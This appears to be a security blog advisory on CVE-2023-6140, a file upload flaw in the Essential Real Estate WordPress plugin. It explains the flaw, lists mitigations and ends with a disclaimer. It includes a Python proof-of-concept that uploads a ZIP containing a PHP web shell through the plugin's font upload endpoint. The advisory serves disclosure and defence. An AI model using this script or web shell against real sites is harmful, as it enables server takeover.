Ameeba Blog Logo
Ameeba Chat App store presentation

CVE-2023-6140: Arbitrary File Upload Vulnerability in Essential Real Estate WordPress Plugin

Ameeba’s Mission: Safeguarding privacy by securing data and communication with our patented anonymization technology.

Vulnerability Summary

  • CVE ID: CVE-2023-6140

  • Severity: High (CVSS 3.1 Score: 8.8)

  • Attack Vector: Network

  • Privileges Required: Low (Subscriber+)

  • User Interaction: None

  • Impact: Remote Code Execution (RCE)

Affected Products

Product Affected Versions
Essential Real Estate WordPress Plugin Versions ≤ 4.3.5

How the Exploit Works

The Essential Real Estate plugin for WordPress fails to adequately validate file types during the font upload process. This oversight allows authenticated users with subscriber-level permissions or higher to upload arbitrary files, including PHP scripts disguised as ZIP archives. Once uploaded, these malicious files can be executed on the server, leading to remote code execution.WPScan+4Wordfence+4VulDB+4NVD+3Feedly+3WPScan+3

The vulnerability resides in the gsf_upload_fonts AJAX action, which lacks proper checks to prevent the upload of dangerous file types. An attacker can exploit this by crafting a ZIP archive containing a malicious PHP file and uploading it through the vulnerable endpoint.

Ameeba Chat – The World’s Most Private Chat App
No phone number, email, or personal info required.
Download App Now Learn More

Conceptual Example Code

An attacker might use the following Python script to exploit the vulnerability:

<span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">from</span> io <span class="hljs-keyword">import</span> BytesIO
<span class="hljs-keyword">import</span> zipfile

<span class="hljs-comment"># Target URL and credentials</span>
url = <span class="hljs-string">'https://target-site.com'</span>
username = <span class="hljs-string">'subscriber_user'</span>
password = <span class="hljs-string">'password123'</span>

<span class="hljs-comment"># Start a <a class="wpil_keyword_link" href="https://chat.ameeba.com" title="session" data-wpil-keyword-link="linked" data-wpil-monitor-id="24330">session</a></span>
session = requests.Session()

<span class="hljs-comment"># Log in to WordPress</span>
login_data = {
<span class="hljs-string">'log'</span>: username,
<span class="hljs-string">'pwd'</span>: password,
<span class="hljs-string">'wp-submit'</span>: <span class="hljs-string">'Log In'</span>,
<span class="hljs-string">'redirect_to'</span>: <span class="hljs-string">f'<span class="hljs-subst">{url}</span></span>/wp-admin/',
<span class="hljs-string">'testcookie'</span>: <span class="hljs-number">1</span>
}
session.post(<span class="hljs-string">f'<span class="hljs-subst">{url}</span></span>/wp-login.php', data=login_data)

<span class="hljs-comment"># Retrieve nonce</span>
profile_page = session.get(<span class="hljs-string">f'<span class="hljs-subst">{url}</span></span>/wp-admin/profile.php')
nonce = <span class="hljs-string">'extracted_nonce_value'</span> <span class="hljs-comment"># Extract nonce from the profile_page content</span>

<span class="hljs-comment"># Create malicious ZIP file in memory</span>
zip_buffer = BytesIO()
<span class="hljs-keyword">with</span> zipfile.ZipFile(zip_buffer, <span class="hljs-string">'w'</span>, zipfile.ZIP_DEFLATED) <span class="hljs-keyword">as</span> zip_file:
zip_file.writestr(<span class="hljs-string">'malicious.php'</span>, <span class="hljs-string">'<?php system($_GET["cmd"]); ?>'</span>)
zip_file.writestr(<span class="hljs-string">'style.css'</span>, <span class="hljs-string">''</span>) <span class="hljs-comment"># Required file</span>
zip_buffer.seek(<span class="hljs-number">0</span>)

<span class="hljs-comment"># Upload the malicious ZIP file</span>
files = {<span class="hljs-string">'file_font'</span>: (<span class="hljs-string">'malicious.zip'</span>, zip_buffer, <span class="hljs-string">'application/zip'</span>)}
data = {<span class="hljs-string">'_nonce'</span>: nonce, <span class="hljs-string">'name'</span>: <span class="hljs-string">'malicious_font'</span>}
response = session.post(<span class="hljs-string">f'<span class="hljs-subst">{url}</span></span>/wp-admin/admin-ajax.php?action=gsf_upload_fonts', data=data, files=files)

<span class="hljs-built_in">print</span>(response.text)

This script logs into the WordPress site using subscriber credentials, retrieves the necessary nonce, creates a malicious ZIP file containing a PHP shell, and uploads it via the vulnerable AJAX action.WPScan

Potential Risks

Mitigation Recommendations

  • Update the Plugin: Upgrade to Essential Real Estate version 4.4.0 or later, which addresses this vulnerability.NVD+2WPScan+2Wordfence+2

  • Restrict File Uploads: Implement server-side checks to validate file types and restrict uploads to necessary formats only.Wordfence

  • Limit User Permissions: Ensure that users have the minimum necessary permissions to perform their roles.

  • Monitor Server Activity: Regularly review server logs for suspicious activities, such as unexpected file uploads or executions.

Conclusion

CVE-2023-6140 is a critical vulnerability in the Essential Real Estate WordPress plugin that allows authenticated users with minimal permissions to upload and execute arbitrary PHP files, leading to potential full site compromise. Administrators should promptly update the plugin and implement the recommended security measures to protect their websites.Feedly+1NVD+1NVD

References

Disclaimer:

The information and code presented in this article are provided for educational and defensive cybersecurity purposes only. Any conceptual or pseudocode examples are simplified representations intended to raise awareness and promote secure development and system configuration practices.

Do not use this information to attempt unauthorized access or exploit vulnerabilities on systems that you do not own or have explicit permission to test.

Ameeba and its authors do not endorse or condone malicious behavior and are not responsible for misuse of the content. Always follow ethical hacking guidelines, responsible disclosure practices, and local laws.

Ameeba Chat
The world’s most private
chat app

No phone number, email, or personal info required. Stay anonymous with encrypted messaging and customizable aliases.

Download Now Learn More

More posts